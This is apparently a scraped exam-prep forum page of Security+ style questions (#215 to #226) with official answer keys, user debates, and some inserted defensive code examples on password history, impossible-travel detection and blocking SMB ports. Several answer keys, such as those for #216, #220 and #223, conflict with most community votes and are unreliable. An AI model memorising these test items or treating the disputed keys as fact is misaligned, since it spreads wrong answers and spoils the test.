Gino_Slim Highly Voted 3 months, 1 week ago
Selected Answer: C
The reason why it's netstat and not nmap for this question:

Nmap is a network mapping tool. That means it's used to discover information about hosts on a network (their IP, open ports, etc). Whereas netstat
is a network statistic tool used to list active connections.

The question is asking about seeing active connections.


upvoted 6 times

Oval61251 3 months ago
Very helpful, thank you
upvoted 2 times

ronniehaang Most Recent 4 days, 1 hour ago
Selected Answer: C
C. netstat

Netstat (Network Statistics) is a command-line utility that can be used to display the current network connections on a server, including incoming
and outgoing connections, as well as network statistics, such as the number of packets sent and received, and the number of errors. Netstat can
be used to view the status of TCP and UDP connections, including information about the local and remote addresses, the state of the
connection, and the process ID (PID) associated with the connection. This information can be used by the security analyst to identify any
suspicious connections or traffic patterns, and to help determine the source of the security incident.
upvoted 1 times

andrizo 3 months, 3 weeks ago
Wouldn't nmap also work?
upvoted 2 times

omodara 4 months ago
Ans A. netstat -a will display all the current active connections, the internet protocol type, IP addresses, port numbers, and the state of the
connection
upvoted 1 times

omodara 4 months ago
I meant the answer is C, netstat; sorry for the typo.
upvoted 4 times


Question #216 Topic 1

A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile
applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should
the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

A. Enable the remote-wiping option in the MDM software in case the phone is stolen.

B. Configure the MDM software to enforce the use of PINs to access the phone.

C. Configure MDM for FDE without enabling the lock screen.

D. Perform a factory reset on the phone before installing the company's applications.

Correct Answer: C

Community vote distribution


B (94%) 6%

Kashim Highly Voted 4 months ago
Selected Answer: B
B. Configure the MDM software to enforce the use of PINs to access the phone. It is the only answer that honestly makes sense to me.
FDE (full disk encryption) does not address those problems.
upvoted 8 times

Demichollo 3 weeks, 2 days ago
I believe option B makes more sense
upvoted 1 times

Thanks_stoneface Most Recent 1 day, 20 hours ago
B - This is the only option that doesn't affect the employees' personal data on their personal phone. It's the least intrusive while providing some
protection of company data.
upvoted 1 times

ronniehaang 4 days ago
Selected Answer: A
A. Enable the remote-wiping option in the MDM software in case the phone is stolen.

This option would allow the company to remotely wipe only the company data from the employee's device in case it's lost or stolen, while
preserving the employee's personal data. This addresses both the company's concern of protecting its data and the employee's concern of
preserving their personal data. The use of remote-wiping in conjunction with encryption, such as full disk encryption (FDE), can provide an added
layer of protection for sensitive company data stored on the device.
upvoted 1 times

carpathia 2 months, 3 weeks ago
I would go with A as the biggest concern of data loss is when the device is lost or stolen, whether it has a PIN or not. I am not sure though, as the
company has to have a policy (in MDM) stating they can wipe the BYOD owner's data as well. God knows.
upvoted 2 times

ronah 1 month, 3 weeks ago
From CompTIA A+ to Net+, the answer is always wiping data if it's stolen.
upvoted 1 times

ronah 1 month, 3 weeks ago
Oh, but the question states the user is afraid to "lose his personal data", hence it's not talking about the company's data. I will go for B.
upvoted 1 times

carpathia 2 months, 3 weeks ago
I'll go with B in the end, after going through a CompTIA book on the subject.
upvoted 1 times

Gino_Slim 3 months, 1 week ago
Selected Answer: B
Due to process of elimination, B, is the only one that comes close. A and D are talking about wiping the phone which doesn't help with the
employee concerns. The other just doesn't even begin to apply. "Full Disk Encryption" is definitely causing personal loss.
upvoted 1 times

CertAddict69 3 months, 3 weeks ago
Selected Answer: B
Only B makes any sense.
upvoted 3 times
theglass 3 months, 4 weeks ago
Selected Answer: B
B is the only one that makes sense to me.
upvoted 3 times

Question #217 Topic 1

The concept of connecting a user account across the systems of multiple enterprises is BEST known as:

A. federation.

B. a remote access policy.

C. multifactor authentication.

D. single sign-on.

Correct Answer: A

Community vote distribution


A (100%)

omodara Highly Voted 4 months ago
Answer A is correct. SSO allows users to use a single set of credentials to access multiple systems within a single organization (a single domain),
while federation allows users to access systems across multiple organizations.
upvoted 10 times

alayeluwa 3 months, 3 weeks ago
Niceee
upvoted 1 times

Gino_Slim Most Recent 3 months, 1 week ago
Selected Answer: A
It's A and not D this time because SSO (single sign-on) lets you access multiple things within YOUR domain/organization. Federation
allows you to go to multiple of those with one set of credentials.
upvoted 1 times

passmemo 4 months ago
Selected Answer: A
Federation
upvoted 2 times

serginljr 4 months ago
Selected Answer: A
A correct
upvoted 2 times


Question #218 Topic 1

A user received an SMS on a mobile phone that asked for bank details. Which of the following social-engineering techniques was used in this
case?

A. SPIM

B. Vishing

C. Spear phishing

D. Smishing

Correct Answer: D

Community vote distribution


D (100%)

omodara Highly Voted 4 months ago
I go with D. SPIM is unwanted messages sent over instant messaging (IM) channels, Vishing is VOIP, Spear phishing is targeting a specific group
or individual via email.
upvoted 9 times

mlonz Most Recent 5 days, 9 hours ago
Smishing (a mashup of SMS and phishing) is a form of phishing that uses text instead of email. Some smishing texts include malicious
attachments, and some try to trick the user into giving up personal information.
upvoted 1 times

Gino_Slim 3 months, 1 week ago
Selected Answer: D
Just think of "smishing" as "SMS Phishing"
upvoted 2 times

serginljr 4 months ago
Selected Answer: D
D correct
upvoted 4 times


Question #219 Topic 1

A company is working on mobile device security after a report revealed that users granted non-verified software access to corporate data. Which
of the following is the MOST effective security control to mitigate this risk?

A. Block access to application stores

B. Implement OTA updates

C. Update the BYOD policy

D. Deploy a uniform firmware

Correct Answer: C

Community vote distribution


A (76%) C (21%)

Kashim Highly Voted 4 months ago
Selected Answer: A
A. Block access to application stores. In my opinion it is the most effective way to prevent standard users from installing unknown software if
they are using corporate-owned mobile phones.
upvoted 11 times

NICKJONRIPPER 2 months, 1 week ago
Apps from app stores can be much safer than a downloaded APK.
upvoted 1 times

ronniehaang Most Recent 4 days ago
Selected Answer: D
D. Deploy a uniform firmware

The most effective security control to mitigate the risk of users granting non-verified software access to corporate data is deploying a uniform
firmware. This is because a uniform firmware ensures that all mobile devices have the same software version, which makes it easier to monitor
and control the access of different software applications to corporate data. This ensures that only authorized and verified software applications
can access the corporate data, reducing the risk of exposure to malicious or untrusted software. By deploying a uniform firmware, the company
can also reduce the risk of security vulnerabilities, as it can easily patch and update the firmware to address any known security issues.
upvoted 1 times

its_melly 1 month ago
Selected Answer: A
From my understanding and previous experience managing MDM, I believe the "non-verified" part of the question is referring to the company
itself not verifying. For example, someone installs Facebook from the app store and allows it access to the photos app that contains company
images. Facebook is a verified app in all app stores but would be considered a non-verified application to the company because they didn't
approve of the install. Therefore, blocking access to the app store will keep them from installing applications the company hasn't approved.

Assuming the device is a personal device and user can go online and download applications outside of the app store is reading too much into
the question. Look at what it asked specifically.
upvoted 3 times

FMMIR 1 month, 3 weeks ago
Selected Answer: C
Blocking access to application stores is not as effective as updating the BYOD policy for mitigating the risk of granting non-verified software
access to corporate data. Blocking access to application stores would prevent users from downloading any software from external sources,
including trusted and verified sources. This could prevent users from accessing important apps and tools, and it would not address the
underlying issue of users granting access to corporate data to non-verified software. Updating the BYOD policy, on the other hand, would allow
the company to specify which types of software are allowed on corporate devices, require that employees only download software from trusted
sources, and implement other controls to prevent the use of non-verified software. This would provide a more targeted and effective solution for
mitigating the risk of granting access to corporate data to non-verified software
upvoted 2 times

Sandon 1 month, 3 weeks ago
Nope, it never said the devices are personally owned.
upvoted 1 times

TKW36 2 months, 1 week ago
Selected Answer: A
It doesn't say these mobile devices are personally owned, they could be corporate owned so updating the BYOD policy wouldn't help. Going
with A.
upvoted 1 times


JSOG 2 months, 2 weeks ago
Selected Answer: C
From Quizlet, the answer is C, which was what I was guessing would be the answer.
upvoted 1 times

JSOG 2 months, 2 weeks ago
Moreover, blocking access to the APK store wouldn't be right because that would prevent employees from using their device as they normally would,
thus the company wouldn't deprive them of that unless they decide to have them use COPE devices.
upvoted 1 times

  Sbuda002 3 months ago


Selected Answer: C
Apk files can be downloaded directly from the internet. The policy is the only thing that can affect the settings, which is where the permissions are set.
upvoted 2 times

  yasuke 2 months, 3 weeks ago


Do application stores have verified SW or non-verified SW? They must have downloaded the apk from somewhere else. A BYOD policy update
makes sense here.
upvoted 2 times

  zharis 3 months, 1 week ago


Selected Answer: C
BYOD is a security framework for personally owned devices that needs to be updated
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
Generally with mobile devices, applications are downloaded from the App Store/Play Store. So, this would apply this time around. You can update the
policy all day, but that doesn't mean it's going to be abided by.
upvoted 2 times

  03allen 3 months, 2 weeks ago


It doesn't say it's a work mobile; it could be a BYOD one signed in with work data (e.g. Outlook).
upvoted 2 times

  andrizo 3 months, 3 weeks ago


Selected Answer: A
Permissions to corp data, had to reread
upvoted 2 times

  abrilo 3 months, 3 weeks ago


even if the company blocks access to app stores, can't the users get apps from the web?
upvoted 3 times

  Gino_Slim 3 months, 1 week ago


I mean it's possible with side-loading, but most users aren't doing that. Generally with mobile devices, applications are downloaded from the App
Store/Play Store. So, this would apply this time around.
upvoted 1 times

  passmemo 3 months, 3 weeks ago


Selected Answer: A
No doubt
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: A
I'd vote A, considering this is the BEST way to prevent them; it doesn't give any other restrictions or say who owns the devices.
upvoted 4 times


Question #220 Topic 1

A security analyst needs to implement security features across smartphones, laptops, and tablets. Which of the following would be the MOST
effective across heterogeneous platforms?

A. Enforcing encryption

B. Deploying GPOs

C. Removing administrative permissions

D. Applying MDM software

Correct Answer: A

Community vote distribution


D (92%) 8%

  Ha9ate Highly Voted  4 months ago


Selected Answer: D
I will choose D, because smartphones, laptops, and tablets can all install MDM to manage the device.
upvoted 9 times

  JSOG Most Recent  2 months, 1 week ago


Selected Answer: D
Correction: the answer is D.
upvoted 1 times

  JSOG 2 months, 2 weeks ago


Selected Answer: A
A is the answer for me.
upvoted 1 times

  JSOG 2 months, 1 week ago


Answer D, my bad.
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: D
MDM sounds convincing. Encryption on mobile phones?
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


It's not A everyone.

Also, MDM is Mobile Device Management. Kind of a dead giveaway.


upvoted 1 times

  snofear 4 months ago


Yup, definitely D.
MDM stands for Mobile Device Management; it is software that assists in managing, monitoring, and securing
several mobile devices such as tablets, smartphones, and laptops used in the organization to access corporate information.
upvoted 3 times

  JSOG 2 months, 1 week ago


The answer is D, guys.
upvoted 1 times

  serginljr 4 months ago


In the old test the correct answer was D.

https://www.examtopics.com/discussions/comptia/view/76878-exam-sy0-601-topic-1-question-329-discussion/
upvoted 2 times


Question #221 Topic 1

The new Chief Information Security Officer at a company has asked the security team to implement stronger user account policies. The new
policies require:

* Users to choose a password unique to their last ten passwords


* Users to not log in from certain high-risk countries

Which of the following should the security team implement? (Choose two.)

A. Password complexity

B. Password history

C. Geolocation

D. Geofencing

E. Geotagging

F. Password reuse

Correct Answer: BC

Community vote distribution


BD (58%) BC (39%)

  passmemo Highly Voted  4 months ago


Selected Answer: BC
Password history and Geolocation
upvoted 13 times

  comeragh Highly Voted  3 months, 3 weeks ago


Selected Answer: BD
I would go with B&D here. Password history is self-explanatory.
Geolocation - geolocation is often used to track the movements and location of people, and for surveillance. More for tracking than restricting
access. Open to discussion here...
upvoted 9 times

  Matt0123 Most Recent  2 weeks, 5 days ago


Selected Answer: BD
Geolocation is not for preventing access, think of a fence keeping someone out
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: BC
B. Password history
C. Geolocation
upvoted 2 times

  viksap 1 month, 2 weeks ago


Selected Answer: BD
Geofencing: a virtual geographic fence. Geolocation is a tracking method
upvoted 2 times

  ebeewhy 1 month, 2 weeks ago


Selected Answer: BD
From the CompTIA Study guide - "Geofencing refers to accepting or rejecting access based on location."
upvoted 1 times

  JSOG 2 months ago


Selected Answer: BD
Geolocation uses Global Positioning System (GPS) to identify a
device’s location. Geofencing uses GPS to create a virtual fence or
geographic boundary. Organizations use geofencing to enable access
to services or devices within the boundary and block access outside
the boundary. from the compTIA sec ebook page 518
upvoted 2 times


  Nome02 2 months ago


B. For password history so it can be reused for last 10 passwords.
D. To restrict access from a defined geographical location. (Geolocation only tells the GPS-based location of the device; it does not restrict access.)
upvoted 3 times

  carpathia 2 months, 1 week ago


Selected Answer: BD
Geolocation is not used for not allowing devices when in certain locations (Conklin's book).
upvoted 2 times

  okay123 2 months, 2 weeks ago


Selected Answer: BD
Geofencing is a technology for setting virtual boundaries and triggering events when these boundaries are crossed by a mobile device on which
certain software is installed.
VS
Geolocation is a technology that uses data acquired from an individual's computer or mobile device to identify or describe the user's actual
physical location.

So, B and D makes sense. Geolocation is for tracking, Geofencing is for triggering actions like blocking...
upvoted 5 times

  carpathia 2 months, 3 weeks ago


Selected Answer: BD
"Geofencing is a location-based service that triggers actions in the mobile application or other software programs when the device enters a set
location". Geolocation doesn't do that.
upvoted 3 times

  ImpactTek 2 months, 3 weeks ago


B. Password history is obvious.

geolocation= Geolocation is the process of identifying and tracking the location of linked electronic devices using location technologies such as
GPS or IP addresses.

geofencing = Geofencing is a location-based approach that allows a physical location to be given virtual boundaries. These virtual perimeters can
be shown on a map and used to initiate actions or alerts when people enter, exit, or remain in the region.

Therefore I go with geofencing, because its purpose is to allow or block, but geolocation is just for identifying and tracking.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: BC
Answer: Geolocation & Password history

Password history policies determine the number of unique new passwords that must be associated with a user's account before an old password
can be reused. The security team can implement password history and allow the user to use an old password after 10 new unique passwords.

Geolocation uses GPS or IP addresses to identify and track the location of connected devices. The security team can configure geolocation rules
that would block login attempts by location, like the high-risk countries.
upvoted 3 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: BD
I did quite a bit of research on this one, but I think I finally got to a conclusion. First get the obvious answer out of the way: B - Password history --
> I think most of us get that.
Now to the controversial answer: It should be "D" because geolocation is the technology used to perform geofencing, and to actually restrict
logins from certain locations you would use geofencing. Here is a video explaining it pretty well:
https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/mobile-device-management-2/
upvoted 2 times

  Imok 3 months ago


Selected Answer: BD
Password History and Geofencing (for authentication)
upvoted 3 times

  ostralo 3 months, 2 weeks ago


Selected Answer: BC
History
Geolocation - Identify a request’s country of origin, and block IPs coming from countries with high fraud activity
upvoted 2 times

  Lv2023 3 months, 3 weeks ago


I would say option (F) to satisfy the first requirement. Password reuse is the practice of preventing the selection of a password that has already
been used. "The history attribute sets how many previous passwords are blocked." This as per the comptia study guide. I say option (D) to
satisfy the second requirement.
upvoted 2 times
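The two policy requirements in this question, password history and location-based login blocking, are easy to get wrong in implementation (comparing plaintext passwords, or keeping history in a form that lets an attacker recover old passwords). The following is an added example, not code from the page or from CompTIA, showing both controls enforced together: the last ten passwords are kept only as salted PBKDF2 digests and a candidate is re-hashed under each stored salt, and the login path geolocates the source address and then applies a geofencing decision on top of it. The GeoIP table, the country code "XX" and the user names are constructed assumptions; a real deployment resolves addresses through a GeoIP database.

```python
import hashlib
import hmac
import os
from ipaddress import ip_address, ip_network

# Constructed GeoIP lookup table (assumption): documentation prefixes mapped
# to country codes. "XX" stands in for a high-risk country on the blocklist.
GEOIP_TABLE = {
    ip_network("198.51.100.0/24"): "FR",
    ip_network("203.0.113.0/24"): "XX",
}
BLOCKED_COUNTRIES = {"XX"}

HISTORY_DEPTH = 10       # the last ten passwords set, newest first
PBKDF2_ROUNDS = 10_000   # kept low so the example runs quickly; use far more in production


def country_for(ip):
    """Geolocation: map a source address to a country code (None if unknown)."""
    addr = ip_address(ip)
    for net, country in GEOIP_TABLE.items():
        if addr in net:
            return country
    return None


def login_allowed_from(ip):
    """Geofencing: the allow/deny decision built on top of geolocation.
    Unknown locations are allowed here; a stricter policy would deny them."""
    return country_for(ip) not in BLOCKED_COUNTRIES


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; a fresh random salt when none is supplied."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class Account:
    def __init__(self, initial_password):
        self.history = []            # (salt, digest) pairs, newest first
        self.set_password(initial_password)

    def password_in_history(self, candidate):
        """Re-hash the candidate under every stored salt; compare in constant time."""
        for salt, digest in self.history:
            _, candidate_digest = hash_password(candidate, salt)
            if hmac.compare_digest(candidate_digest, digest):
                return True
        return False

    def set_password(self, new_password):
        if self.password_in_history(new_password):
            raise ValueError("password matches one of the last %d used" % HISTORY_DEPTH)
        self.history.insert(0, hash_password(new_password))
        del self.history[HISTORY_DEPTH:]   # age out anything older than ten changes

    def verify(self, password):
        """The current password is always the newest history entry."""
        salt, digest = self.history[0]
        return hmac.compare_digest(hash_password(password, salt)[1], digest)
```

Note that the history check re-hashes the candidate under each old salt rather than storing old passwords in a reversible form, so a dump of the history table is no more useful to an attacker than a dump of the current hashes.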

Question #222 Topic 1

Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?

A. SSAE SOC 2

B. PCI DSS

C. GDPR

D. ISO 31000

Correct Answer: C

Community vote distribution


C (55%) A (45%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: SSAE SOC 2

SSAE SOC 2(Standards of Attestations Engagement No. 16, System and Organizations Controls Report 2, Type 2) - auditing report that assesses
how well organizations handle data security, system privacy, data confidentiality and data processing processes.

======================
GDPR (General Data Protection Regulation) - a regulation in EU laws that requires businesses to protect the personal data and privacy of EU
citizens for transactions that occur within EU member states.

The ISO 31000 Risk Management framework is an international standard that provides businesses with guidelines and principles for risk
management from the International Organization for Standardization.

PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards for organizations that handle credit cards.
upvoted 10 times

  Sandon 2 months, 1 week ago


Statements on Standards for Attestation Engagements, Service Organization Control Type II*
upvoted 2 times

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: C
I looked into this and a LOT of sources are saying GDPR. So, let's go with that guys. We can't all be wrong..........I mean we can't right?

Right...?
upvoted 9 times

  alwaysrollin247 1 month, 1 week ago


Well, the question doesn't say anything about EU and since GPDR is an EU regulation, the best alternate choice would be SSAE SOC 2. I
mean honestly, don't you think this would be outlined in another source outside of the EU for the rest of the world?
upvoted 3 times

  PraygeForPass Most Recent  3 weeks ago


Selected Answer: A
Another COMPTIA funny question.
We have no mention of the EU, so who does this apply to specifically?

What if this question is in relation to NA or some other entity...


I'm going with A since the definition of SSAE SOC 2 fits the question..
upvoted 1 times

  IzaacL23 1 month, 1 week ago


Selected Answer: A
Yeah this is totally A without a doubt. GDPR shows how to deal with security information only for EU. SSAE SOC 2 is a universal report that
establishes security controls and roles.
upvoted 1 times

  FMMIR 2 months ago


Selected Answer: C
The General Data Protection Regulation (GDPR) has been the most comprehensive data protection law to date. According to the GDPR, personal
data is any information related to an identifiable person or data subject. The personal information includes name, location, the ID number of an
entity, and special category information consists of the physiological, genetic, and social identity of the person. These data must be controlled
and processed by the data controllers and data processors.


upvoted 2 times

  Ranaer 2 weeks, 3 days ago


Seeing how on pretty much every topic you are picking the wrong answers, I am confident that you are wrong this time as well. The correct
answer should be A.
upvoted 1 times

  Ranaer 4 days ago


Disregard my attitude. It seems I was annoyed at something at the time of writing this.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
As I'm from Europe I might be a little bit biased on this one, but I know for sure that data controller and data processor are fixed terms used in
GDPR.
Data Controller – Is a legal or natural person, an agency, a public authority, or any other body who, alone or when joined with others, determines
the purposes of any personal data and the means of processing it.

Data Processor – Is a legal or a natural person, agency, public authority, or any other body who processes personal data on behalf of a data
controller.

I don't know too much about SSAE, so maybe it happens to be that they use exactly the same wording here, but I'll go with GDPR on this one.
upvoted 2 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: A
dare to go for it
upvoted 1 times

  JohnMangley 3 months, 2 weeks ago


Selected Answer: C
C.

https://kirkpatrickprice.com/video/gdpr-fundamentals-roles-under-the-law-controllers-processors-and-joint-controllers/
upvoted 2 times

  adodoccletus 3 months, 2 weeks ago


A is the correct answer
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


Answering A
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Selected Answer: A
What snofear said
upvoted 1 times

  CertAddict69 3 months, 3 weeks ago


I think this is C as the GDPR applies to these groups.
upvoted 2 times

  Ha9ate 3 months, 4 weeks ago


Selected Answer: C
C correct
upvoted 2 times

  snofear 4 months ago


Selected Answer: A
Statement on Standards for Attestation Engagements.This AICPA-developed auditing report assesses how well organizations handle data
security, system privacy, data confidentiality and data processing processes.
upvoted 3 times

  andrizo 3 months, 3 weeks ago


I agree
upvoted 2 times

  serginljr 4 months ago


Selected Answer: C
C correct
upvoted 4 times


Question #223 Topic 1

Which of the following is MOST likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that
may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have
been implemented?

A. An RTO report

B. A risk register

C. A business impact analysis

D. An asset value register

E. A disaster recovery plan

Correct Answer: C

Community vote distribution


B (85%) Other

  J_Ark1 Highly Voted  2 months, 3 weeks ago


Selected Answer: B
I somehow miss stoneface lol, but I shall carry his logic: "Key words, peeps"
upvoted 8 times

  serginljr Highly Voted  4 months ago


In the old test the answer was B.

https://www.examtopics.com/discussions/comptia/view/74664-exam-sy0-601-topic-1-question-316-discussion/
upvoted 6 times

  nicekoda Most Recent  1 month, 1 week ago


The answer is Risk Register. To start with, business impact analysis is a systematic process, while a risk register is a DOCUMENT that contains
everything described in the question.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: B
I'd go with risk matrix, but guess what... CompTIA does not have that answer -.- So the risk register is the next best thing to use.
upvoted 1 times

  Imok 3 months ago


Selected Answer: B
Risk Register
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: D
on the spot
upvoted 1 times

  zharis 3 months, 1 week ago


my bad. C is on the spot not D
upvoted 1 times

  ostralo 3 months, 2 weeks ago


Risk assessments analyze potential threats and their likelihood of happening, a business impact analysis explains the effects of particular
disasters and their severity.
upvoted 1 times

  p610878 3 months, 3 weeks ago


Selected Answer: C
Business impact analysis (BIA) is the process of performing risk assessment on
business tasks and processes rather than on assets. The purpose of BIA is to determine the
risks to business processes, set criticality prioritization, and begin the design of protective and recovery solutions.
upvoted 2 times

  passmemo 3 months, 3 weeks ago


Selected Answer: B
A risk register is a document that records all of your organisation's identified risks, the likelihood and consequences of a risk occurring, the
actions you are taking to reduce those risks and who is responsible for managing them
upvoted 3 times

  DYKO 4 months ago


Selected Answer: B
The risk register is the primary tool that risk management professionals use to track risks facing the organization.
upvoted 4 times


Question #224 Topic 1

A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate
office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would BEST
prevent this type of attack?

A. Network location

B. Impossible travel time

C. Geolocation

D. Geofencing

Correct Answer: B

Community vote distribution


B (88%) 13%

  comeragh Highly Voted  4 months ago


Selected Answer: B
Agree with B here
upvoted 5 times

  Gino_Slim Most Recent  3 months, 1 week ago


Selected Answer: B
I would normally have selected Geolocation. However, the question was adamant about mentioning the distance and time between logins.

Geolocation would stop you from logging in outside of a different area entirely.
While in this case, it seems that the issue is the amount of time that occurred between logins from different places.

We have to look at the inner workings of the question itself, because geolocation would work if they only wanted users to log in while in France.

It may not sound like it, but "impossible travel time" is actually a policy-type thing.
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


Selected Answer: B
I vote impossible travel time. It states it is a worldwide company, so you cannot set up a geofencing perimeter. However, you could have
impossible travel time alerts.
upvoted 4 times

  nicekoda 1 month, 1 week ago


Smart analysis
upvoted 1 times

  pgonza 2 months, 2 weeks ago


Thanks for highlighting the key word "Worldwide". The other key word is "Seconds"
upvoted 1 times

  Ha9ate 3 months, 4 weeks ago


Selected Answer: B
B correct
upvoted 2 times

  [Removed] 3 months, 4 weeks ago


Selected Answer: D
Is this not Geofencing?
upvoted 2 times

  pgonza 2 months, 2 weeks ago


The company is said to be worldwide, so you can't geofence. Correct answer is B.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


That's only on-premises.
upvoted 1 times

  serginljr 4 months ago


Selected Answer: B
B correct
upvoted 2 times
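Impossible travel is a computation, not a static rule: the system keeps the last login location per account and, on each new login, divides the great-circle distance from the previous location by the elapsed time. Below is an added example (not from the page) that does exactly that over a constructed login log containing the France-then-Brazil case from the question and a benign Paris-to-Lyon trip. The city coordinates, the 1000 km/h ceiling and the log format are assumptions; in practice the source IP is resolved to coordinates through a GeoIP database.

```python
import math
from datetime import datetime, timezone

# Constructed coordinates for the cities in the sample log (assumption).
CITY_COORDS = {
    "Paris": (48.8566, 2.3522),
    "Lyon": (45.7640, 4.8357),
    "Sao Paulo": (-23.5505, -46.6333),
}
MAX_PLAUSIBLE_KMH = 1000.0   # faster than an airliner is treated as impossible


def haversine_km(a, b):
    """Great-circle distance in kilometres between two (lat, lon) pairs."""
    earth_radius_km = 6371.0
    lat1, lon1 = map(math.radians, a)
    lat2, lon2 = map(math.radians, b)
    dlat, dlon = lat2 - lat1, lon2 - lon1
    h = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2
    return 2 * earth_radius_km * math.asin(math.sqrt(h))


def parse_event(line):
    """'2023-01-20T09:00:00Z,user,City' -> (datetime, user, city)."""
    ts, user, city = line.split(",")
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, user, city


def find_impossible_travel(lines):
    """Return one alert per login whose implied speed from the previous login is impossible."""
    last_seen = {}
    alerts = []
    for ts, user, city in sorted(parse_event(line) for line in lines):
        if user in last_seen:
            prev_ts, prev_city = last_seen[user]
            distance = haversine_km(CITY_COORDS[prev_city], CITY_COORDS[city])
            hours = (ts - prev_ts).total_seconds() / 3600.0
            # The same city twice is never impossible; two different cities with
            # no elapsed time always are (avoids dividing by zero).
            if distance > 0 and (hours == 0 or distance / hours > MAX_PLAUSIBLE_KMH):
                alerts.append({"user": user, "from": prev_city, "to": city,
                               "km": round(distance), "hours": round(hours, 4)})
        last_seen[user] = (ts, city)
    return alerts


# Constructed login log (not from the page).
SAMPLE_LOG = [
    "2023-01-20T09:00:00Z,jdoe,Paris",
    "2023-01-20T09:00:05Z,jdoe,Sao Paulo",
    "2023-01-20T08:00:00Z,asmith,Paris",
    "2023-01-20T12:00:00Z,asmith,Lyon",
]
```

A production version would also tolerate VPN egress points and mobile carrier NAT, which are the usual sources of false positives for this check; the worldwide company in the question is exactly why a per-country geofence would not work while a speed check does.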

Question #225 Topic 1

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the
issue. The security administrator is concerned that servers in the company’s DMZ will be vulnerable to external attack; however, the administrator
cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following
TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Choose two.)

A. 135

B. 139

C. 143

D. 161

E. 443

F. 445

Correct Answer: BF

Community vote distribution


BF (100%)

  Ha9ate Highly Voted  4 months ago


Selected Answer: BF

SMB uses TCP ports 139 and 445, and UDP ports 137 and 138.
upvoted 6 times

  ronniehaang Most Recent  4 days ago


Selected Answer: BF
The security administrator should block TCP ports 445 and 139 for all external inbound connections to the DMZ as a workaround to protect the
servers from the SMB protocol vulnerability. These ports are commonly used by SMB for communication. Blocking these ports for external
inbound connections can prevent external attackers from exploiting the vulnerability, while still allowing the internal systems and applications to
use SMB for communication.
upvoted 1 times

  serginljr 4 months ago


Selected Answer: BF
BF correct
upvoted 2 times
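The workaround in this question is a source-aware block, not a plain port block: internal systems on the LAN must still reach SMB on the DMZ servers while every external source is dropped on TCP 139 and 445. The following added example (not from the page) models that decision for an inbound flow and renders the equivalent netfilter rules for the DMZ hosts' external interface. The LAN and DMZ prefixes and the interface name are constructed assumptions.

```python
from ipaddress import ip_address, ip_network

# SMB over TCP: 139 (NetBIOS session service) and 445 (direct-hosted SMB).
SMB_TCP_PORTS = {139, 445}

# Constructed address plan (assumption): LAN prefixes whose systems legitimately
# use SMB against the DMZ servers, and the DMZ subnet itself.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
DMZ_NET = ip_network("172.16.10.0/24")


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def inbound_decision(src_ip, dst_ip, dst_port, proto="tcp"):
    """Decide an inbound flow into the DMZ under the workaround.

    SMB from internal systems stays allowed (the service cannot be disabled);
    SMB from anywhere else is dropped; every other port falls through to the
    existing policy, modelled here as 'allow'.
    """
    if ip_address(dst_ip) not in DMZ_NET:
        return "not-dmz"
    if proto == "tcp" and dst_port in SMB_TCP_PORTS and not is_internal(src_ip):
        return "drop"
    return "allow"


def iptables_rules(external_iface):
    """Render the host-based equivalent for a DMZ server's external interface.

    -I puts each rule at the top of INPUT so an existing broad ACCEPT cannot
    shadow it; traffic arriving on the internal interface is unaffected.
    """
    return [
        "iptables -I INPUT -i %s -p tcp --dport %d -j DROP" % (external_iface, port)
        for port in sorted(SMB_TCP_PORTS)
    ]
```

After applying the rules, confirm the exposure is gone from outside (a TCP connect to 445 and 139 on each DMZ address should time out) and that an internal host can still map a share; the first check proves the block, the second proves you did not break the LAN dependency the administrator was worried about.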


Question #226 Topic 1

A recent phishing campaign resulted in several compromised user accounts. The security incident response team has been tasked with reducing
the manual labor of filtering through all the phishing emails as they arrive and blocking the sender’s email address, along with other time-
consuming mitigation actions. Which of the following can be configured to streamline those tasks?

A. SOAR playbook

B. MDM policy

C. Firewall rules

D. URL filter

E. SIEM data collection

Correct Answer: A

Community vote distribution


A (100%)

  Kashim Highly Voted  4 months ago


Selected Answer: A
Automation = SOAR playbook
upvoted 6 times

  carpathia Most Recent  2 months, 3 weeks ago


Selected Answer: A
